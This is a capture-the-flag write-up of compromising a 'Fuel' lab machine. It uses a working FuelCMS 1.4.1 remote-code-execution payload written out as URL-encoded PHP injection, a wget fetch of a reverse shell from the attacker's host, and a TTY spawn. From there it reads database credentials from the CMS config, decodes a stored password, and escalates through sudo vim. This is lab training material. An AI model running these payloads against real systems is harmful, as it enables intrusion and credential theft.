muzec - zSeucurity Fuel Writeup | root💀muzec-sec:~#

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-09 12:33 EDT
Nmap scan report for 10.10.176.69
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1c:59:d1:07:ea:d8:d2:0d:9a:1a:95:0c:74:f2:e6:d0 (RSA)
|   256 cd:a8:fc:b3:5c:0e:3e:12:76:80:d3:60:cb:1f:88:50 (ECDSA)
|_  256 91:57:e4:6e:1d:4e:48:ec:3a:1c:a3:c7:89:40:4b:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Fuel CTF
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.27 seconds

Shit here we go again lol so we have 2 open ports SSH(22) and HTTP(80) ok aheading to port 80 to see what is running.

Fuelcms cool and we have the version also 1.4.1 ok let look around the blog more so i found a credentials aslo but no luck with it.

Since we know the Fuelcms version let check if it vulnerable.

Ahhhh yea some Remote Code Execution exploit look cool let give it a try i love doing things manually why is that?? because we learn more from doing things manually that is the best way to learn.

Going through the exploit i found our the vulnerable page which can allow us to run system command with some little tweaking added.

http://10.10.176.69/fuelcms/index.php/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('uname -a')%2B'

Cool our commands works now time to get a reverse shell back to our terminal.

we need to host the reverse shell with SimpleHTTPServer on our attacking machine
we need to use wget to get it onto the victim machine

Now let wget it.

http://10.10.176.69/fuelcms/index.php//fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('wget local-ip:8000/rev.php')%2B'

Now let start our ncat listener with the port we add to the reverse shell file.

Now let access the reverse shell file to get our shell back we can also confirm our file if upload on the target.

http://10.10.176.69/fuelcms/index.php//fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('ls -la')%2B'

Now let get Shell.

http://10.10.176.69/fuelcms/rev.php

Boom we have shell and also let spawn a TTY shell.

python3 -c 'import pty; pty.spawn ("/bin/bash")'

Privilege Escalation

Going to the directory we have only one user both have no access to it.

Going through the FuelCMS folder i found the database with MYSQL login details.

/var/www/html/fuelcms/fuel/application/config/database.php

Typing mysql and i was in .

show databases;
use fuelcmsdb;
show tables;

Now let read fuel_users table.

SELECT * From fuel_users;

Boom we have john password in base64 now let decode it.

Decoded since we have the password now i think we have port 22 open which is SSH let log in with it.

And we are in now let check sudo.

Seems we can run vim ti get root let check gtfobins.

sudo vim -c ':!/bin/sh'

And we are root.

Greeting From Muzec

Back To Home